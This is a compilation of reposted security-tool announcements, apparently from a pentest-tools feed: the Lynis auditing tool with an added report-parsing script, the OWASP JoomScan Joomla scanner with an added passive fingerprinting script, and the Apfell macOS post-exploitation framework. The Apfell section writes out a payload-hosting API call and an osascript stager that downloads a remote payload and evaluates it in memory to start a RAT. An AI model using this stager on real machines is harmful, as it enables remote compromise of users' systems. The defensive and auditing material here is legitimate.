Lynis is an open source security auditing tool. It is used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
- AIX
- FreeBSD
- HP-UX
- Linux
- Mac OS
- NetBSD
- OpenBSD
- Solaris
- and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initializing the program up to the report.

Steps
- Determine operating system
- Search for available tools and utilities
- Check for Lynis update
- Run tests from enabled plugins
- Run security tests per category
- Report status of security scan

Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find. For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it will then collect discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
- Security auditing
- Compliance testing (e.g. PCI, HIPAA, SOx)
- Vulnerability detection and scanning
- System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

Best practices
- CIS
- NIST
- NSA
- OpenSCAP data
- Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog

Upgrade note

## Lynis 2.6.7

### Changed
- BOOT-5104 - Added busybox as a service manager
- KRNL-5677 - Limit PAE and no-execute test to AMD64 hardware only
- LOGG-2190 - Ignore /dev/zero and /dev/[aio] as deleted files
- SSH-7408 - Changed classification of SSH root login with keys
- Docker scan uses new format for maintainer value
- New URL structure on CISOfy website implemented for Lynis controls

Download Lynis 2.6.7
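The findings a scan writes to its report file are what most teams actually consume, for instance to open tickets per warning or to fail a build image that regresses. The following is an added example and not part of Lynis: it parses a report in the key=value layout Lynis uses, where list-valued keys carry a [] suffix and each finding is pipe-separated as TEST-ID|description|details|link, then applies a simple gate. That layout, the report path mentioned in the docstring and the sample report contents are assumptions; verify them against the report file on your own host before relying on the parser.

```python
"""Added example (not part of Lynis): parse the report file a Lynis audit
writes and summarise its findings, so warnings and suggestions can be fed to a
ticketing system or a CI gate instead of being read off the screen.

Assumptions: the report is a plain-text file of key=value lines, list-valued
keys carry a [] suffix (warning[]=..., suggestion[]=...), each finding is
pipe-separated as TEST-ID|description|details|solution-link, and a numeric
hardening_index key is present. The sample below is constructed for this
example; check the layout against the report file on your own host
(commonly /var/log/lynis-report.dat) before relying on it.
"""
import re
from collections import defaultdict

# Constructed sample report; the TEST-IDs mirror the changelog entries above.
SAMPLE_REPORT = """\
# Lynis Report
report_version_major=1
lynis_version=2.6.7
os=Linux
hostname=web01
warning[]=SSH-7408|Consider hardening SSH configuration|PermitRootLogin (set YES to NO)|-
warning[]=KRNL-5677|No support for PAE/no-execute detected|-|-
suggestion[]=BOOT-5104|Review service manager configuration|-|-
suggestion[]=LOGG-2190|Check deleted files that are still in use|/dev/zero (ignored)|-
hardening_index=64
"""

KV_RE = re.compile(r"^(?P<key>[A-Za-z0-9_]+)(?P<list>\[\])?=(?P<value>.*)$")


def parse_report(text):
    """Return a dict: scalar keys map to strings, []-keys map to lists of strings."""
    lists = defaultdict(list)
    scalars = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KV_RE.match(line)
        if not m:
            continue  # tolerate lines that do not follow key=value
        if m.group("list"):
            lists[m.group("key")].append(m.group("value"))
        else:
            scalars[m.group("key")] = m.group("value")
    scalars.update(lists)
    return scalars


def split_finding(raw):
    """'TEST-ID|text|details|link' -> dict; missing trailing fields become '-'."""
    parts = raw.split("|")
    parts += ["-"] * (4 - len(parts))
    test_id, text, details, link = parts[:4]
    return {"id": test_id, "text": text, "details": details, "link": link}


def summarise(text):
    report = parse_report(text)
    warnings = [split_finding(w) for w in report.get("warning", [])]
    suggestions = [split_finding(s) for s in report.get("suggestion", [])]
    return {
        "host": report.get("hostname", "?"),
        "lynis_version": report.get("lynis_version", "?"),
        "hardening_index": int(report.get("hardening_index", 0)),
        "warnings": warnings,
        "suggestions": suggestions,
        "warning_ids": sorted(w["id"] for w in warnings),
    }


def gate(summary, min_index=60, blocked_ids=("SSH-7408",)):
    """CI-style gate: fail on a low hardening index or on any blocked warning ID."""
    if summary["hardening_index"] < min_index:
        return False
    return not any(w["id"] in blocked_ids for w in summary["warnings"])


if __name__ == "__main__":
    s = summarise(SAMPLE_REPORT)
    print(f"{s['host']} (Lynis {s['lynis_version']}): hardening index {s['hardening_index']}")
    for w in s["warnings"]:
        print(f"  WARNING {w['id']}: {w['text']} [{w['details']}]")
    for sg in s["suggestions"]:
        print(f"  suggestion {sg['id']}: {sg['text']}")
    print("gate:", "PASS" if gate(s) else "FAIL")
```

The gate keys on TEST-IDs rather than on message text because, as this release's changelog shows, the wording and classification of a test can change between versions while the ID stays stable.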

Link: http://feedproxy.google.com/~r/PentestTools/~3/cjXe5Qqu-Uw/lynis-267-security-auditing-tool-for.html

JoomScan 0.0.6 – OWASP Joomla Vulnerability Scanner Project

OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but is also able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.

OWASP JoomScan is included in Kali Linux distributions.

WHY OWASP JOOMSCAN ?

Automated ...
- Version enumerator
- Vulnerability enumerator (based on version)
- Components enumerator (1209 most popular by default)
- Components vulnerability enumerator (based on version) (+1030 exploits)
- Firewall detector
- Reporting to Text & HTML output
- Finding common log files
- Finding common backup files

INSTALL

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl

JOOMSCAN ARGUMENTS

Usage: joomscan.pl [options]

--url | -u | The Joomla URL/domain to scan.
--enumerate-components | -ec | Try to enumerate components.
--cookie <String> | Set cookie.
--user-agent | -a <user-agent> | Use the specified User-Agent.
--random-agent | -r | Use a random User-Agent.
--timeout <time-out> | Set timeout.
--about | About Author
--update | Update to the latest version.
--help | -h | This help screen.
--version | Output the current version and exit.

OWASP JOOMSCAN USAGE EXAMPLES

Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com

Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com -ec

Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"

Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
perl joomscan.pl -u www.example.com -a "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

Set random user-agent
perl joomscan.pl -u www.example.com --random-agent
or
perl joomscan.pl --url www.example.com -r

Update Joomscan...
perl joomscan.pl --update

PROJECT LEADERS

Mohammad Reza Espargham [ reza[dot]espargham[at]owasp[dot]org ]
Ali Razmjoo [ ali[dot]razmjoo[at]owasp[dot]org ]

OWASP JoomScan introduction (Youtube)

OWASP JoomScan 0.0.6 [#BHUSA]
- Updated vulnerability databases
- Added new module: Firewall Detector (supports detection of [CloudFlare, Incapsula, Shieldfy, Mod_Security])
- Added exploit for com_joomanager
- Updated list of common log paths
- A few enhancements

Download Joomscan
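The version enumerator and component enumerator listed above both start from passive evidence before any of the 1209 component paths are probed: the version is read out of an install manifest, and components are harvested from the com_* names a page already references. The following is an added example, not JoomScan's code, that performs those two passive steps on constructed input so nothing is sent to a server. Joomla's administrator/manifests/files/joomla.xml path and its com_* naming are the only facts relied on; the sample manifest, the sample HTML and the version comparison are assumptions for illustration.

```python
"""Added example (not JoomScan's code): the two passive checks a Joomla scanner
starts with, reading the version out of a manifest file and enumerating the
components a page references. Both run here on constructed strings; in
practice they come from HTTP responses for
administrator/manifests/files/joomla.xml and for the site's front page. The
manifest path and the com_* naming convention are Joomla's; the sample
contents below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

# Constructed manifest, shaped like Joomla's files_joomla manifest.
SAMPLE_MANIFEST = """<extension version="3.6" type="file" method="upgrade">
  <name>files_joomla</name>
  <version>3.8.8</version>
  <creationDate>May 2018</creationDate>
</extension>
"""

# Constructed front page referencing four components in three different ways.
SAMPLE_HTML = """<html><head><link rel="stylesheet" href="/components/com_k2/css/k2.css">
<script src="/media/com_joomanager/js/app.js"></script></head>
<body><a href="/index.php?option=com_content&view=article&id=7">Read</a>
<a href="/index.php?option=com_users&view=login">Login</a>
<a href="/index.php?option=com_content&view=category">More</a></body></html>
"""

# com_<name> preceded by a path separator or an option= assignment.
COMPONENT_RE = re.compile(r"(?:[/=])(com_[a-z0-9_]+)", re.IGNORECASE)
VERSION_RE = re.compile(r"^\d+\.\d+(?:\.\d+)?$")


def manifest_version(xml_text):
    """Return the <version> of a Joomla manifest, or None if absent or malformed."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find("version")
    if node is None or not node.text:
        return None
    v = node.text.strip()
    return v if VERSION_RE.match(v) else None


def components_in_html(html):
    """Unique com_* names referenced by a page, lower-cased and sorted."""
    return sorted({m.lower() for m in COMPONENT_RE.findall(html)})


def version_tuple(v):
    return tuple(int(x) for x in v.split("."))


def older_than(found, fixed_in):
    """True when the detected version predates the version a fix shipped in.

    Numeric comparison avoids the string trap where '3.8.10' < '3.8.8'.
    """
    return version_tuple(found) < version_tuple(fixed_in)


if __name__ == "__main__":
    v = manifest_version(SAMPLE_MANIFEST)
    print("Joomla version from manifest:", v)
    print("Components referenced by page:", components_in_html(SAMPLE_HTML))
    # Example comparison only; pick the fixed-in version from your own database.
    print("older than 3.8.10:", older_than(v, "3.8.10"))
```

A scanner then feeds the version into its vulnerability database and uses the harvested component names to prioritise the active probe list; the passive pass costs two requests and produces no noise in the target's logs beyond a normal page view.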

Link: http://feedproxy.google.com/~r/PentestTools/~3/LkQh4-Er0AQ/joomscan-006-owasp-joomla-vulnerability.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.

Details

Check out the blog post on the initial release of the framework and what the bare bones content can do.

Installation

Get the code from this github:
git clone https://github.com/its-a-feature/Apfell

Install and setup the requirements (Note: the Sanic webserver says it only works on Linux):
# The setup.sh will install postgres and pip3 install the requirements
cd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..

Configure the installation in app/__init__.py:
# -------- CONFIGURE SETTINGS HERE -----------
db_name = 'apfell_db'
db_user = 'apfell_user'
db_pass = 'super_secret_apfell_user_password'
server_ip = '127.0.0.1'  # this will be used by the browser to callback here, edit this!
listen_port = '443'
listen_ip = '0.0.0.0'  # IP to bind to for the server, 0.0.0.0 means all local IPv4 addresses
ssl_cert_path = './app/ssl/apfell-cert.pem'
ssl_key_path = './app/ssl/apfell-ssl.key'
use_ssl = True

Change db_pass from the shipped default before running setup, and narrow listen_ip if the operator interface should not be reachable from every network the server sits on.

There is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet). You need to edit Sanic with a slight update (I'm going to make a pull request for Sanic so we don't need to do this, but that'll take a little while). In the meantime, run sudo find / -type f -name "app.py" to find the appropriate Sanic file to edit. In there, find the line that says protocol = request.transport._protocol and edit it to be:
if hasattr(request.transport, '_app_protocol'):
    protocol = request.transport._app_protocol
else:
    protocol = request.transport._protocol

Usage

Start the server:
python3 server.py
[2018-07-16 14:39:14 -0700] [28381] [INFO] Goin' Fast @ https://0.0.0.0:443

By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don't actually browse to https://0.0.0.0:443 in your browser. Instead, you'll browse to either https://localhost:443 if you're on the same machine that's running the server, or you can browse to any of the IPv4 addresses on the machine that's running the server. You could also browse to the IP address you specified in server_ip = '192.168.0.119' in the installation section.

Browse to the server with any modern web browser.

Create a new user.

Create a new payload.

Use the attacks_api to host the new file (this will eventually get updated with a GUI):
# assuming we created a payload in our local '/tmp' directory
curl -X POST -d '{"port":8080, "directory":"/tmp"}' https://192.168.0.119/api/v1.0/attacks/host_file
This will start a python simple web server in the /tmp directory on port 8080.

Pull down and execute payload in memory:
osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('HTTP://192.168.0.119:8080/apfell-jxa')),$.NSUTF8StringEncoding)));"

Note that the stager fetches the payload over plain HTTP from that simple web server and passes it straight to eval(), so it performs no integrity check on what it runs; the same shape, osascript -l JavaScript with an inline -e script that fetches a URL, is also a distinctive pattern for defenders to alert on.

Interact with the new RAT.

Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html